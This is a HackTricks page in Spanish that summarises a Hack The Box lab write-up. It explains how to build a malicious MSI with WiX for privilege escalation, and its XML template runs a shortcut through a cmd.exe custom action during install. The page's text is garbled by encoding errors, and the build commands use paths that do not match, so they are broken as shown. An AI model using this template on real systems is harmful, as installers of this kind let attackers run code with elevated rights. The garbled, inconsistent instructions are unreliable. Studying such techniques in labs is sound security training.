tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Creaci贸n de MSI Malicioso y Obtenci贸n de Root
La creaci贸n del instalador MSI se realizar谩 utilizando wixtools, espec铆ficamente se utilizar谩 wixtools. Vale la pena mencionar que se intentaron constructores de MSI alternativos, pero no tuvieron 茅xito en este caso particular.
Para una comprensi贸n completa de los ejemplos de uso de wix MSI, se aconseja consultar esta p谩gina. Aqu铆, puedes encontrar varios ejemplos que demuestran el uso de wix MSI.
El objetivo es generar un MSI que ejecute el archivo lnk. Para lograr esto, se podr铆a emplear el siguiente c贸digo XML (xml de aqu铆):
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
Es importante notar que el elemento Package contiene atributos como InstallerVersion y Compressed, que especifican la versi贸n del instalador e indican si el paquete est谩 comprimido o no, respectivamente.
El proceso de creaci贸n implica utilizar candle.exe, una herramienta de wixtools, para generar un wixobject a partir de msi.xml. El siguiente comando debe ser ejecutado:
candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
Adem谩s, vale la pena mencionar que se proporciona una imagen en la publicaci贸n, que muestra el comando y su salida. Puedes referirte a ella para obtener orientaci贸n visual.
Adem谩s, se utilizar谩 light.exe, otra herramienta de wixtools, para crear el archivo MSI a partir del wixobject. El comando que se ejecutar谩 es el siguiente:
light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix
Similar al comando anterior, se incluye una imagen en la publicaci贸n que ilustra el comando y su salida.
Tenga en cuenta que, aunque este resumen tiene como objetivo proporcionar informaci贸n valiosa, se recomienda consultar la publicaci贸n original para obtener detalles m谩s completos e instrucciones precisas.
Referencias
- https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root
- https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with wixtools
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.